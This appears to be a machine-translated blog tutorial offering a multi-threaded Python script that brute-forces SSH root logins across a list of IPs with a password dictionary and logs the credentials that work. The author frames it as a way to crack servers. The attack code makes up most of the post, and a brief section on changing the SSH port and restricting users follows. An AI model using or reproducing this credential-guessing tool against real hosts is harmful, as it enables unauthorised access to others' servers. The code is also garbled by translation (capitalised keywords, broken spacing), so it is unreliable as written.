Example of multi-thread ssh cracking in python

0x01. About

In the past few days, I found that 22 of my friend's servers had been cracked, so I thought about it and wanted to blow another server.

A small python script written when a weak password is cracked. The main function is to use multi-thread dictionary cracking ssh. It supports ip table import and dictionary data import.

It mainly uses the python paramiko module and multi-thread threading module.

The first thing to prepare is the dictionary dict and server ip table.

Things are simple. The main default directory is as follows:

| -- Ssh. scan. py
| --/Log:
Sshd
| --/Dict:
Ip
Password
The ip address and password are placed in one row.

0x02. Code

The source code is as follows, and the file is saved as ssh. scan. py. View usage: python ssh. scan. py-h

#! /Usr/bin/python
#-*-Coding: UTF-8 -*-
Import paramiko, threading, sys, time, OS
 
Class SSHThread (threading. Thread ):
Def _ init _ (self, ip, port, timeout, dic, LogFile ):
Threading. Thread. _ init _ (self)
Self. ip = ip
Self. port = port
Self. dict = dic
Self. timeout = timeout
Self. LogFile = LogFile
Def run (self ):
Print ("Start try ssh => % s" % self. ip)
Username = "root"
Try:
Password = open (self. dict). read (). split ('\ n ')
Except t:
Print ("Open dict file '% s' error" % self. dict)
Exit (1)
For pwd in password:
Try:
Ssh = paramiko. SSHClient ()
Ssh. set_missing_host_key_policy (paramiko. AutoAddPolicy ())
Ssh. connect (self. ip, self. port, username, pwd, timeout = self. timeout)
Print ("\ nIP => % s, Login % s => % s \ n" % (self. ip, username, pwd ))
Open (self. logFile, ""). write ("[% s] IP => % s, port => % d, % s => % s \ n" % (time. asctime (time. localtime (time. time (), self. ip, self. port, username, pwd ))
Break
Except t:
Print ("IP => % s, Error % s => % s" % (self. ip, username, pwd ))
Pass
Def ViolenceSSH (ip, port, timeout, dic, LogFile ):
Ssh_scan = SSHThread (ip, port, timeout, dic, LogFile)
Ssh_scan.start ()
 
Def main (ipFile, dic, log ):
If ipFile = "-h ":
Help ()
Try:
IpText = open (ipFile). read (). split ('\ n ')
For ipin ipText:
If ip! = '':
Time. sleep (0.5)
Threading. Thread (target = ViolenceSSH, args = (ip, 22, 1, dic, log,). start ()
Except t:
Print ("Open IP list file '% s' error" % ipFile)
Exit (1)
Def help ():
Print ("python ssh. scan. py instructions: \ n \
Python ssh. scan. py ip_file_path dict_file_path ssh_log_path \ n ")
Exit (1)
 
If _ name _ = '_ main __':
 
Fpath = OS. path. dirname (OS. path. abspath ('_ file __'))
IpFile = sys. argv [1] if len (sys. argv)> 1 else fpath + "/dict/ip"
Dic = sys. argv [2] if len (sys. argv)> 2 else fpath + "/dict/password"
Log = sys. argv [3] if len (sys. argv)> 3 else fpath + "/log/sshd"
Try:
OS. system ("clear ")
Main (ipFile, dic, log)
Except t KeyboardInterrupt:
Exit (1)
The result is ugly. You can use your own server:

0x03. Solution

What should we do? To prevent brute-force password cracking, modify the ssh default logon port. The main modification method is to modify the ssh configuration file:

1. Modify iptables

First, you must go through the firewall and modify the firewall rules:

/Sbin/iptables-a input-m state -- state NEW-m tcp-p tcp -- dport 2333-j ACCEPT

Save rule:

Service iptables save

Restart firewall:

Service iptables restart

2. Modify the ssh configuration file

Cp/etc/ssh/ssh_config/etc/ssh/ssh_config.bak
Cp/etc/ssh/sshd_config/etc/ssh/sshd_config.bak

Modify the ssh Port:

Vim/etc/ssh/sshd_config

Add Port 2333 under Port # Port 22

Vim/etc/ssh/ssh_config

Add Port 2333 under Port # Port 22

Restart the ssh service:

Service sshd restart

3. Other modifications

Restrict SSH access

Assume that as long as xiaocao and homeway users can use the system via SSH, add

Vim/etc/ssh/sshd_config

Modify the following line:

AllowUsers xiaocao homeway

Package download

Https://pan.baidu.com/s/1kuonfzh,password: yhna